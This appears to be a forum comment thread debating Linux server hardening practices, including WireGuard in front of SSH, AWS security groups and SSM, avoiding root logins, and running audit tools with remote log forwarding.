You can put SSH on a different port but it can still be found through port scanning and poked at. Figuring out whether Wireguard is running at all or which port it's on is, from my understanding, very much not a trivial task if possible at all from the outside. This extra layer prevents attackers from even getting a chance at poking around with SSH.


It's definitely neat to know how these things work on a Linux server, but most of this advice doesn't make sense for an EC2 instance. You should be using security groups instead of UFW (indeed the article mentions this). You don't need to configure SSH access because SSM session manager exists, which also makes the WireGuard setup superfluous, too.


> You should not log in directly as root.

Why not?


I see this as mostly a way to prevent fat finger mistakes on the part of the sysadmin. Most of the tasks that need to be done when interactively logging in don't really require root per se. Why give yourself so much ambient permissions then? If I accidentally issue a command that only root can execute, it is a chance to reflect when repeating the command with sudo and typing the password.


No Fail2ban?


Too many attack surface vectors (from within the Linux/glibc/bash)?


Run lynis and linpeas!!!

Also, setup auditd and rsyslog forwarding. Backup anything important.
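For example (package names per Debian/Ubuntu; the remote log host is hypothetical):

  apt install lynis auditd
  lynis audit system            # prints warnings and hardening suggestions

  # /etc/rsyslog.d/90-forward.conf -- ship a copy of all logs off-box
  *.* @@logs.example.com:514    # @@ = TCP, a single @ = UDP
  # then: systemctl restart rsyslog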


Wouldn't it be easier to use OpenBSD?


OpenBSD doesn't even have security advisories like most other distros have. [1]

So I'd argue it's impossible to build a correct threat model if all your vulnerabilities are expressed at the code level, rather than in terms of "what software" or "what packages" are affected.

[1] https://www.openbsd.org/errata73.html


Nice try.


No mention of SSH certificates?



